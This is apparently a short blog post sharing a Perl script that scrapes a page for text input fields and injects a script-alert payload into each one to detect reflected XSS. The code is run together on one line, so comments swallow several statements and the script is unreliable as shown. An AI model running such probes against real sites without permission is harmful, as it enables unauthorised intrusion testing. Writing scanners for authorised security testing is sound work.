Today I wrote a simple perl script to automatically discover XSS vulnerabilities into a web application.
Following the code:
#!/usr/bin/perl use strict;use LWP::Simple;my ($url, $webpage, @webpage, @name, $result); if(@ARGV < 1) { usage();} #Get web page specified by cmd$webpage = get("http://" . $ARGV[0]); #Split variable into an arry@webpage = split(/\n/, $webpage); #Parsing Web Page to obtain names of "input type=text" foreach (@webpage) { if($_ =~ /input\stype="text"\sname="(\w{1,30})"/) { push(@name, $1); }} #Print found search boxif(@name) { print "I've found the following search box:\n"; foreach (@name) { print "$_\n"; } print "and I've discovered that:\n"; #Automatically exploit search box to verify XSS vulnerabilities foreach (@name) { $result = get("http://" . $ARGV[0] . "?" . $_ . "=<script>alert('test_XSS')</script>"); if($result =~ /<script>alert\('test_XSS'\)<\/script>/) { print "$_ is vulnerable to XSS\n"; } else { print "$_ isn't vulnerable to XSS\n";} }} else { print"I have not found search boxes in " . $ARGV[0] . "\n";} sub usage() { print"Usage: ".$0." <url>\n"; print "Example: " . $0 . " ivanobinetti.com\n"; exit;}